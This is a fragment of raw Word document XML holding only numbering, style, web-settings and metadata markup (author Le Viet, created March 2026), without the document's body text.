          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00EA4348" w:rsidRPr="00C31D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1444E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EED03FF2"/>
    <w:lvl w:ilvl="0" w:tplc="27428C9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440F4C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9FFC251E"/>
    <w:lvl w:ilvl="0" w:tplc="7C0A21CA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="284" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Wingdings" w:cstheme="minorBidi" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1004" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1724" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2444" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3164" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3884" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4604" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5324" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6044" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="863979241">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="408966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B40"/>
    <w:rsid w:val="000222DE"/>
    <w:rsid w:val="00062D26"/>
    <w:rsid w:val="001F086D"/>
    <w:rsid w:val="002356EC"/>
    <w:rsid w:val="002A2EA6"/>
    <w:rsid w:val="002B76B4"/>
    <w:rsid w:val="0037576B"/>
    <w:rsid w:val="00376F71"/>
    <w:rsid w:val="003C30E9"/>
    <w:rsid w:val="003D3021"/>
    <w:rsid w:val="00557638"/>
    <w:rsid w:val="005D03D1"/>
    <w:rsid w:val="00657B40"/>
    <w:rsid w:val="006766AD"/>
    <w:rsid w:val="006C4597"/>
    <w:rsid w:val="00716DD7"/>
    <w:rsid w:val="00774EB7"/>
    <w:rsid w:val="00801AA7"/>
    <w:rsid w:val="008C477A"/>
    <w:rsid w:val="00A35987"/>
    <w:rsid w:val="00B54682"/>
    <w:rsid w:val="00BE1C88"/>
    <w:rsid w:val="00BE2FE9"/>
    <w:rsid w:val="00C31D6C"/>
    <w:rsid w:val="00DE6F3E"/>
    <w:rsid w:val="00E42CB0"/>
    <w:rsid w:val="00E446C8"/>
    <w:rsid w:val="00EA4348"/>
    <w:rsid w:val="00F70D42"/>
    <w:rsid w:val="00FC3E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75B37"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BDF32EBD-15BA-4B20-8677-F57BFADA5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B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7B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7B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7B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7B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7B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B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B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B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B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7B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7B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7B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7B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7B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B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B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B40"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00657B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B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B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B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B40"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00657B40"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00657B40"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00657B40"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00657B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B40"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00657B40"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006766AD"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D03D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D03D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810373">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="322709698">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="389424085">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="413432069">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="539129848">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="947545337">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="965240329">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="966935138">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1030373022">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1269892984">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1272202933">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1453478933">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1467045172">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1475947630">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1494833242">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1657148340">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1683967645">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1716352567">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="191477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290</TotalTime>
  <Pages>20</Pages>
  <Words>1034</Words>
  <Characters>5897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Viet</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Le Viet</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-04T15:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-05T02:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>